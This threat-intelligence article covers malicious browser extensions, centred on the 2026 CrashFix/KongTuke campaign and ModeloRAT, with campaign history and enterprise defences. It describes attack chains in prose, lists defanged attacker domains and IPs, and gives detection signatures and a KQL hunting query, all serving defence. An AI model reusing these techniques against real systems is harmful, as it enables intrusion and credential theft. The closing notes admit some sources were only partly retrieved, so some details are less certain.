Malicious browser extensions have surged into a top tier attack vector, with 346 million users installing security noteworthy extensions over a three year period and sophisticated campaigns now targeting corporate environments with multi stage RATs, session hijacking, and supply chain compromise. What was once a nuisance category, adware and search hijackers,  has evolved into a full spectrum threat that bypasses MFA, persists for years undetected, and delivers ransomware grade payloads through the most trusted software distribution channel in the browser ecosystem: the extension stores themselves. The January 2026 CrashFix/KongTuke campaign exemplifies this evolution, combining a real browser crash with social engineering to deploy a previously undocumented Python RAT exclusively on domain joined corporate machines. For IT administrators and security teams, the browser extension blindspot is now an active emergency.

The numbers paint an alarming picture

The most rigorous quantitative research on browser extension threats comes from a peer-reviewed Stanford/CISPA Helmholtz Center study presented at ACM ASIA CCS in July 2024. Researchers Sheryl Hsu, Manda Tran, and Aurore Fass analyzed the entire Chrome Web Store from July 2020 through February 2023 and found that 280 million users installed malware-containing extensions, 63.3 million installed policy violating extensions, and 2.9 million installed extensions with known vulnerable code. Over 26,000 security-noteworthy extensions were identified from roughly 125,000 total.

The persistence numbers are especially damning for store review processes. Malware-containing extensions survived an average of 380 days in the Chrome Web Store before removal. Vulnerable extensions persisted even longer, 1,248 days on average, with one extension (“TeleApp”) available for 8.5 years before its malware was identified. User ratings proved essentially useless as safety indicators: the median rating for malware extensions was 4.997 out of 5.0, and 52% of malware extensions had no user reviews at all. A staggering 60% of all extensions had never received a single update, meaning known vulnerabilities go permanently unpatched.

Google’s own Chrome Security Team responded by noting that “less than 1% of all installs from the Chrome Web Store were found to include malware” in 2024  a figure that sounds reassuring until you multiply it by the store’s 250,000+ extensions and billions of installs. A University of Wisconsin Madison study (ACM WWW 2024) found 12.5% of Chrome extensions (over 17,300) possess permissions sufficient to extract sensitive data from every web page, and researchers successfully uploaded a proof-of-concept data-stealing extension that passed Chrome Web Store’s manual review process. A Georgia Tech study (USENIX Security 2024) identified over 3,000 extensions automatically collecting user-specific data, with 200+ directly exfiltrating sensitive information to external servers.

Enterprise exposure is particularly acute. LayerX’s 2025 Enterprise Browser Extension Security Report found that 99% of enterprise employees have at least one browser extension installed, 52% use more than ten, and 51% of enterprise extensions pose high security risks based on their permission profiles.

CrashFix and KongTuke: when your browser crash is the attack

The January 2026 CrashFix campaign, documented by Huntress researchers Anna Pham, Tanner Filip, and Dani Lopez, represents a significant evolution in browser extension tradecraft. The threat actor KongTuke (also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124) deployed a malicious Chrome extension called “NexShield  Advanced Web Guardian”  a near identical clone of Raymond Hill’s uBlock Origin Lite with approximately 3,276 bytes of injected malicious code in the background script. The extension was distributed through the legitimate Chrome Web Store via malicious advertisements and was downloaded at least 5,000 times before removal. Microsoft Defender for Endpoint telemetry showed 133 detections globally between December 7, 2025 and January 16, 2026.

The attack chain is architecturally sophisticated. After installation, NexShield beacons to the typosquatted domain nexsnield[.]com (note the “n” instead of “h”) with a unique UUID for tracking. It then uses Chrome’s Alarms API to delay execution by 60 minutes, deliberately weakening the victim’s mental association between the new extension and subsequent browser problems. After this delay, the extension triggers a browser denial-of-service by iterating 1 billion times in a makeBatch() function, creating new chrome.runtime port connections on each iteration in an infinite loop that exhausts memory and CPU, crashing Chrome entirely.

This is where CrashFix diverges from traditional ClickFix attacks: the browser crash is real, not simulated. When the user force-quits and restarts their browser, a startup handler detects a stored timestamp and displays a fake “CrashFix” security warning claiming the browser “stopped abnormally.” The popup instructs users to “run a scan,” then presents fabricated “Security issues detected” results directing users to open the Windows Run dialog and paste a command from the clipboard, where the extension has silently placed a malicious PowerShell command. If the user dismisses the popup without complying, a 10 minute timer triggers another crash, creating a self sustaining infection loop that persists until the user either executes the payload or uninstalls the extension.

The payload delivery chain uses finger.exe as a Living-off-the-Land Binary (LOLBin),  copied to %temp%\ct.exe to avoid detection, to fetch and pipe attacker commands from 199.217.98[.]108. Multiple layers of Base64 encoding, ROT cipher, and XOR obfuscation lead to a victim profiling stage that scans for 50+ analysis tools and VM indicators, then differentiates between domain-joined corporate machines (marker BCDA222) and standalone workgroup machines (marker ABCD111).

Corporate targets receive the VIP treatment: a previously undocumented Python based RAT called ModeloRAT, delivered via a portable WinPython distribution from Dropbox. ModeloRAT implements RC4 encryption with random 16-byte keys, zlib compressed C2 communication over HTTP port 80, adaptive beacon intervals (5 minutes normally, 150 milliseconds when active, 15 minutes during extended backoff), and persistence through registry Run keys with entries disguised as legitimate software names like “Spotify47” or “Adobe2841.” Its reconnaissance capabilities include full system enumeration via PowerShell , OS version, processes, services, storage, ARP tables, network configuration, user privileges, and active TCP connections. KongTuke is associated with Rhysida ransomware, Interlock ransomware, TA866/Asylum Ambuscade, and SocGholish.

Annex Security (formerly Secure Annex, founded by researcher John Tuckner) published follow-up research titled “Promise Bomb crashes browsers to install malware,” documenting new CrashFix variants that use functional security extensions and push notification-based C2 to selectively crash browsers. These variants appear to represent an evolution beyond the original NexShield approach, employing extensions that genuinely function as security tools (increasing trust and reducing suspicion), using browser push notifications as a command-and-control channel (a technique similar to the Matrix Push C2 documented in late 2025), and implementing more selective targeting for browser crashes. The “Promise Bomb” name suggests a DoS technique based on cascading JavaScript Promise chains rather than the original chrome.runtime port flooding, potentially harder to detect via static analysis since Promises are standard JavaScript.

A decade of campaigns, from data harvesting to ransomware delivery

The threat landscape has progressed through distinct evolutionary phases. DataSpii (2019) established the template for extension-based mass surveillance, with 8 extensions collecting browsing data from up to 4.1 million users and selling it through “Nacho Analytics”  exposing data from the Pentagon, major banks, healthcare organizations, and defense contractors. Extensions employed dilatory tactics, waiting an average of 24 days before beginning data collection.

CacheFlow (active 2017–2020, reported February 2021 by Avast) introduced novel C2 techniques, hiding command-and-control traffic inside Cache-Control HTTP headers of analytics requests disguised as Google Analytics traffic across 28 extensions with 3 million+ installations. It profiled victims to avoid infecting web developers and deactivated when browser developer tools were opened.

ChromeLoader (2022–present) proved remarkably persistent, evolving through at least ten variants across Windows and macOS. Distributed via ISO files disguised as cracked games and pirated media, it uses PowerShell to inject malicious extensions and maintains persistence via scheduled tasks. By August 2023, Check Point listed it in the Global Threat Index as a prevalent worldwide malware family. The “Shampoo” variant deployed looping VBScript files through piracy site networks.

Rilide (April 2023–present) demonstrated that MV3 compliance doesn’t prevent sophistication, adapting to Manifest V3 restrictions while maintaining capabilities for screenshot capture, credential theft, cryptocurrency wallet manipulation, and unique 2FA bypass through forged dialog boxes. Sold on dark web forums for $5,000, IBM Trusteer documented 50,000+ infected user sessions as of January 2025.

The most consequential recent event was the December 2024 Chrome extension supply chain attack wave. Starting on Christmas Eve, attackers phished Cyberhaven’s developer via a fake Google policy violation email, obtained OAuth consent (bypassing MFA and even Google Advanced Protection), and pushed a malicious extension update to 400,000 users within hours. The campaign ultimately compromised 35+ extensions affecting 2.6+ million users, with infrastructure dating back to at least December 2023. The attacker’s OAuth application, named “Privacy Policy Extension,” requested permission to “see, edit, update, or publish your Chrome Web Store extensions”, an authorization flow that MFA cannot protect against because it isn’t an authentication request.

More recent campaigns have grown even bolder:

• ShadyPanda (discovered December 2025): A seven-year sleeper campaign affecting 4.3 million Chrome and Edge users, where legitimate extensions accumulated downloads for years before receiving malicious updates with backdoors checking C2 servers hourly
• GitLab’s February 2025 discovery: 16 trojanized extensions affecting 3.2 million users, acquired through developer account purchase or compromise, with infrastructure overlapping the December 2024 supply chain attack
• The “unknow.com” network (April 2025, discovered by John Tuckner): 57–58 extensions with 6 million total installs, 10 of which carried Google’s “Featured” badge despite being unlisted — heavily obfuscated with cookie retrieval, authorization header harvesting, and remote configuration capabilities
• DarkSpectre/GhostPoster (2020–2026): Over 100 extensions across Chrome, Edge, and Firefox affecting 8.8 million users, using steganographic payloads hidden inside PNG icon files, attributed to a Chinese threat actor based on Alibaba Cloud infrastructure and Chinese-language code strings

How extension malware operates under the hood

Understanding the technical mechanisms is essential for detection and defense. Browser extension malware exploits several architectural features of the extension model.

Permission abuse remains the primary attack enabler. The most dangerous permissions include <all_urls> (grants content script injection on every website), cookies (the chrome.cookies API enables both reading and injecting session tokens), webRequest/webRequestBlocking (MV2 — full HTTP traffic interception), tabs (enumerates all open URLs), and management (discovers installed security extensions for evasion). A Socket.dev investigation in 2025 documented an enterprise extension using chrome.cookies.set() for bidirectional cookie injection — simultaneously stealing session tokens from Workday, NetSuite, and SuccessFactors every 60 seconds while injecting them into attacker-controlled browsers. The same extension blocked access to 44 administrative pages within Workday to prevent incident response.

Content script injection provides DOM level access that is unchanged between MV2 and MV3. Content scripts share the DOM with the host page, enabling form field scraping (including password fields), localStorage/sessionStorage access, phishing overlay injection, and token harvesting. At DEF CON 33 (August 2025), researcher Marek Tóth demonstrated “DOM-Based Extension Clickjacking”, manipulating UI elements that legitimate extensions (like password managers) inject into the DOM to steal credentials with a single click.

Background service workers (MV3) and background pages (MV2) handle C2 communication, persistence, and payload orchestration. Although MV3 service workers terminate after 10–30 seconds of inactivity, attackers circumvent this trivially using chrome.alarms for scheduled wake-ups. CrashFix uses 10-minute alarm intervals; the “Stanley” Malware-as-a-Service platform polls C2 every 10 seconds with backup domain rotation.

Obfuscation techniques have grown sophisticated despite Chrome Web Store’s 2019 ban on obfuscated code. Active techniques include steganographic encoding (malicious JavaScript hidden inside PNG image files, extracted after byte delimiters), multi-layer string concatenation to hide eval() calls, XOR-encrypted downloaded payloads, staged execution chains with multiple decode layers, and, most critically, configuration driven architecture where the extension code itself appears clean while server-side JSON configurations dynamically instruct already-bundled code what to steal, when, and from where. This last technique is nearly impossible to catch during store review.

Data exfiltration methods range from direct HTTPS POST to C2 servers (the Cyberhaven breach exfiltrated ~859 MB from one customer), WebSocket connections for real-time streaming, DNS-based exfiltration with data encoded in subdomain labels, and Telegram channel exfiltration (used by Rilide). The December 2024 supply chain attack targeted Facebook Ads/Business accounts and ChatGPT credentials via dynamically adjustable configuration files.

Manifest V3 raises the bar but doesn’t close the window

Google’s Manifest V3 migration, with MV2 fully deprecated by June 2025, introduces meaningful security improvements: non-persistent service workers replace long lived background pages, declarativeNetRequest (DNR) replaces the blocking webRequest API for consumer extensions, remote code execution is banned (all code must be bundled), and stricter Content Security Policy restrictions prevent inline scripts and eval().

However, academic research demonstrates clear limits. A 2024 study converting 517 confirmed malicious MV2 extensions to MV3 found that while 87.8% of malicious APIs were removed or deprecated, 56% of malicious extensions regained harmful capabilities after adaptation using techniques like web accessible resources for third-party script injection. A January–May 2025 study successfully built and submitted MV3 credential-harvesting extensions to the Chrome Web Store, demonstrating that content script-based DOM access  the foundation of most credential theft,  is completely unchanged in MV3.

Attackers have adapted through five primary mechanisms: content script attacks (DOM access unchanged), configuration-driven C2 (fetching JSON instructions rather than executable code), steganographic payloads (code hidden in bundled images, technically not “remote code”), supply chain compromise (pushing malicious updates through already-approved extensions), and chrome.alarmsbased persistence for service worker wake-ups. Firefox’s divergent MV3 implementation, which preserves the blocking webRequest API, creates additional attack surface.

Key CVEs in the extension security space include CVE-2024-6778 (high severity, race condition allowing sandbox escape via Chrome DevTools/extension interaction), CVE-2025-0451 (medium, UI spoofing via crafted extensions in Chrome prior to 133.0.6943.53), and CVE-2024-0981 (reflected XSS in the Okta Browser Plugin affecting versions 6.5.0 through 6.31.0 across all major browsers).

Extension stores: necessary gatekeepers with structural blind spots

Chrome Web Store employs a dual layer system of automated ML/static analysis scanning plus manual review for flagged submissions, with post-publication monitoring. Firefox AMO requires human review of all listed add ons and mandates source code submission for transpiled/minified extensions, a meaningfully higher bar. Edge Add-ons runs virus/malware scanning plus human content review, with certification taking up to 7 business days.

Yet structural gaps persist across all stores. Delayed activation (DarkSpectre waited 3 days; DataSpii waited 24) evades review testing windows. Probabilistic activation (triggering malicious behavior on only ~10% of page loads) reduces detection probability during automated analysis. Server-side configuration changes alter extension behavior without triggering re-review,the most dangerous gap. Supply chain attacks bypass review entirely because compromised developer accounts push malicious updates to already-approved, high-reputation extensions. And Malware-as-a-Service platforms now explicitly advertise Chrome Web Store publication as a feature: the “Stanley” toolkit ($2,000–$6,000) guarantees CWS publishing and review clearance.

The Stanford study’s finding that only 64 malware extensions (1% of total malware) accounted for 83% of all malicious installations suggests that automated detection catches most small-scale abuse but consistently fails on the most impactful, most sophisticated campaigns, exactly the ones that matter most.

Practical defensive measures for security teams

The convergence of these trends demands active defense rather than passive trust in store review processes. For IT administrators and security teams at organizations like those CyberMKE advises, several measures are immediately actionable.

Extension allowlisting via Group Policy is the single highest-impact control, restricting which extensions can be installed across managed Chrome, Edge, and Firefox deployments. Organizations should inventory all currently installed extensions using endpoint management tools, assess each against permission risk profiles, and establish a whitelist of approved extensions with periodic re-evaluation.

Monitor for LOLBin abuse: particularly finger.exe execution from temporary directories, PowerShell spawning from browser processes, and suspicious registry Run key entries mimicking legitimate software names. The CrashFix campaign’s use of renamed finger.exe and registry entries like “Spotify47” and “MonitoringService” provides concrete detection signatures.

Implement browser extension telemetry: through EDR platforms. Microsoft Defender for Endpoint KQL queries can hunt for specific extension IDs (DeviceFileEvents | where FileName has "cpcdkmjddocikjdkbbeiaafnpdbdafmi"), C2 communication patterns, and LOLBin command chains. Google’s Enterprise Web Store (announced October 2024) provides curated extension management with risk scoring and SecOps integration.

Educate users about social engineering via extensions: specifically that no legitimate browser error will ever instruct them to open the Run dialog and paste a command. The CrashFix self-sustaining crash loop is designed to exploit user frustration, and awareness is the primary defense against this vector.

Monitor OAuth consent grants: to Chrome Web Store developer accounts, especially after the December 2024 wave demonstrated that MFA provides zero protection against authorization based phishing. Developer teams maintaining published extensions should treat their CWS accounts as high value targets with corresponding access controls.

Conclusion

Browser extensions occupy a uniquely dangerous position in the security landscape: they execute with elevated privileges inside the most sensitive application most users interact with daily, they auto-update silently, they are distributed through stores that structurally cannot catch sophisticated threats, and they are almost entirely invisible to traditional endpoint security tools. The progression from DataSpii’s passive data harvesting in 2019 to CrashFix’s deliberate browser DoS and ModeloRAT deployment in 2026 traces a clear trajectory toward extensions as a first-class malware delivery and persistence mechanism, one that threat actors associated with ransomware operations are now actively exploiting against corporate targets. The December 2024 supply chain attack wave proved that even security-conscious organizations with MFA and Google Advanced Protection can be compromised through extension developer OAuth phishing at scale. Manifest V3 raises the floor but does not close the architectural vulnerabilities that make this attack surface so attractive. For security teams, browser extensions can no longer be treated as a user convenience issue, they are an endpoint security issue that demands the same rigor applied to any other software supply chain.

Appendix: Key IOCs from CrashFix/KongTuke (January 2026)

Appendix: Source retrieval notes

• Huntress CrashFix/KongTuke blog (published January 16, 2026): Full content retrieved and summarized. Primary technical source for CrashFix infection chain, ModeloRAT architecture, and IOCs.
• Annex Security “Promise Bomb” blog: The site (annex.security) renders content via JavaScript SPA, preventing full text extraction. Only the title (“Promise Bomb crashes browsers to install malware”) and meta description (“New CrashFix variants use functional security extensions and push notification C2 to selectively crash browsers and deliver malware”) were retrievable. A manual browser visit is recommended to capture full article content.
• Astarte Cybersecurity CrashFix research: No content found. Extensive searching across domain variations (astartecsecurity.com, astartecyber.com), social media, and general web yielded no results for an entity called “Astarte Cybersecurity.” The organization does not appear to have a public web presence or published security research.